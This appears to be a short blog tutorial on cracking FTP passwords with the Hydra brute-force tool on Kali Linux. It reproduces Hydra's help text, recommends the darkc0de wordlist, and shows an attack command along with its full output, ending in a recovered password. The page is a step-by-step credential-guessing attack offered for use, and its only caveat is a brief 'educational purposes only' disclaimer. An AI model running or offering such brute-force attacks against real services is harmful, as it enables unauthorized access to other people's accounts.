Cracking ftp Passwords using Hydra Kali linux

Hydra is a password cracking tool that uses brute force to crack passwords of a given url from a given wordlist.We will use Hydra to crack FTP password

These are the Hydra options:

root@blog:~$ hydra -h
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
OPT some service modules support additional input (-U for module help)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. Newest version available at
The following services were not compiled in: sapr3 oracle.

hydra -l john -p doe ftp
hydra -L user.txt -p defaultpw -S imap PLAIN
hydra -l admin -P pass.txt http-proxy://
hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5

For Brute Forcing We need a Wordlist, I suggest you to use darkc0de.lst

Now Lets start:

root@blog:~# hydra -t 1 -l username -P Desktop/darkc0de.lst -vV ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target - login "username" - pass "999uuuu" - 1 of 3546 [child 0]
[ATTEMPT] target - login "username" - pass "uose72" - 2 of 3546 [child 0]
[ATTEMPT] target - login "username" - pass "local123" - 3 of 3546 [child 0]
[21][ftp] host:   login: username   password: 12345678
[STATUS] attack finished for (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2013-05-13 04:32:33

in the line [21][ftp] host: login: username password: 12345678. It has brute forced the url!

Good Luck!!!

This article is for educational purposes only That You Will Safe From Hackers…! . we are not responsible for actions of any individual


Leave a Reply